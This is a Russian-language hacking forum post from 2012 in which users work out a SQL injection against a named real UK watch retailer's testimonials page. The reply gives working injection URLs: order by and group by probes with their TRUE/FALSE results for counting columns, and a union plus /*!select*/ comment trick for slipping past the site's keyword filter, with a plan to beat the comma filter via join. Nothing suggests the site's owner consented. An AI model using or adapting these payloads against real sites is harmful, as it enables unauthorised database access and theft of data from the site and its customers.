04.10.2012, 01:59
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от DeepXhadow
http://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&tes timonial_id=-1%20/*!union*/%20/*!all*/%20*!select*/%20111111111,22222222,33333,bbbbbbbbb--
как обойти филтрацию? фильтруется все, кроме A-z и пробела. Даже запятые в примере выше
Ну я бы не сказал что "прям уж почти всё фильтруется". Это высказывание ложно.
Для начала - инъекция с участием order by проходит на Ура.
Код:
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+8+--+ TRUE
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+9+--+ FALSE
group by как альтернативу order by кстати тоже пропускает.
Код:
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+8+--+
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+9+--+
Вопрос - Как ты подбирал столбцы ? Почему их у тебя 4 ?
Далее - фильтруется не union и не select - фильтруется связка union+select . Обошёл так. Стандартно так-то.
Код:
_ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+union+/*!select*/+1
Приеду домой - попробую обойти фильтр запятых через join - хотя можешь и сам попробовать.
|
|
|